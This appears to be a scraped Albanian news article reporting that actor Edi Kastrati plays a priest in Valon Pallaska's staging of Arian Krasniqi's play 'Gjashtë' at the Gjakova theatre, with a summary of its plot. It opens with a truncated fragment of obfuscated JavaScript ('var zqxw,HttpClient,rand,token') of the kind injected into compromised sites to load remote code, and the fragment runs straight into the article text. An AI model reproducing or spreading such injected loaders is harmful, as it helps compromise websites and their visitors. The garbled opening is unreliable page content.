;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nga “O sa mirë” në teatër”, Edi Kastrati rolin kryesor në shfaqjen e regjisorit Valon Pallaska

By

Ai është drejtor i Teatrit Profesional të Qytetit të Gjakovës, ndërsa emri i tij u bë shumë i dashur për publikun shqiptar me rolin që mori në serinë komike “O sa mirë”.

Ndërsa për publikun e qytetit ku u lind e u rrit, këtë të premte do të interpretojë një rol në shfaqjen e dytë të regjisorit të ri gjakovar, Valon Pallaska.

Në Teatrin e Gjakovës, këtë të premte jepet premiera e shfaqjes “Gjashtë” me autor Arian Krasniqi, ndërsa me regji të Pallaskës. Rolin kryesor atë të një prifti në këtë shfaqje, e luan Edi Kastrati krah aktores së njohur Elida Shasivari.

Përderisa për skenografinë është kujdesur Petrit Bakalli, në dërrasat e teatrit të Gjakovës, pallaska sjellë një shfaqje teatrale që në fokus ka dramën.

Kjo shfaqje flet për Anën, e cila është e dënuar me burgim të përjetshëm dhe pret ekzekutimin në orën 6 të mëngjesit.

Para se ajo t’i nënshtrohet dënimit me vdekje, në ora 12 të darkës vjen Prifti për rrëfim dhe falje të mëkateve të Anës, e cila pasi nuk prano që t’i falë mëkatet fillon të tregojë rrëfimin e jetës së saj, duke filluar nga babai i cili e ka martuar pa dëshirën e saj.

Nga ajo martesë Ana lind një fëmijë të cilin e ka braktisur, e më pas burrin e ekzekuton me gjashtë plumba./Prive.al

Artikuj të ngjashëm